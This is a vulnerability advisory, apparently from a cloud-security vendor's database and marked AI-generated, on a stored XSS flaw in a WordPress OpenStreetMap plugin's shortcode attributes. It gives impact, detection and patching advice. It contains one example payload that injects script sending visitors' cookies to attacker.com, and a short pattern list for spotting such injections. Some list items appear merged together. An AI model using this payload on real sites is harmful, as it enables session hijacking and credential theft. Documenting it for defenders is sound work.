
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-4429 is a Stored Cross-Site Scripting (XSS) vulnerability in the OSM – OpenStreetMap plugin for WordPress, affecting all versions up to and including 6.1.15. The flaw exists in the [osm_map_v3] shortcode, specifically via the marker_name and file_color_list shortcode attributes, due to insufficient input sanitization and output escaping. It was published on April 9, 2026, and assigned a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-site Scripting). The root cause is insufficient sanitization of the marker_name and file_color_list attributes passed to the [osm_map_v3] shortcode, with the unsanitized values being rendered directly into page output. Vulnerable code locations include osm_map_v3/osm-sc-osm_map_v3.php (lines 31 and 560) and osm-icon-class.php (lines 347 and 356) in version 6.1.15. Exploitation requires at minimum Contributor-level WordPress authentication, and the injected script executes in the browsers of any user who visits the affected page (GitHub Advisory, Wordfence).
Successful exploitation allows authenticated attackers with Contributor-level access or higher to persistently inject arbitrary JavaScript into WordPress pages. When other users — including administrators — visit the compromised pages, the malicious scripts execute in their browsers, potentially enabling session hijacking, credential theft, data exfiltration, and website defacement. The changed scope in the CVSS vector reflects that the impact extends beyond the plugin itself to the broader WordPress site and its visitors (GitHub Advisory, Wordfence).
There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation at this time. The EPSS score is approximately 0.056% (0.000560), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for at least Contributor-level WordPress authentication (GitHub Advisory, Wordfence).
[osm_map_v3] shortcode with a malicious payload injected into the marker_name or file_color_list attribute, e.g., [osm_map_v3 marker_name="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>" ...].[osm_map_v3] shortcodes.wp_posts table) for [osm_map_v3] shortcodes containing <script>, javascript:, or encoded variants in marker_name or file_color_list attributes.Update the OSM – OpenStreetMap plugin to a version newer than 6.1.15, which contains the fix for this vulnerability (patch changeset available in the WordPress plugin repository). As an interim measure, restrict Contributor-level access to trusted users only and audit existing posts and pages for any [osm_map_v3] shortcodes containing suspicious content in the marker_name or file_color_list attributes. Site administrators should also consider disabling the plugin until the update can be applied (GitHub Advisory, Wordfence).
Wordfence, which discovered and reported the vulnerability, included it in their weekly WordPress vulnerability report for April 6–12, 2026. No significant broader media coverage or notable researcher commentary beyond the initial disclosure has been identified (Wordfence Blog).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."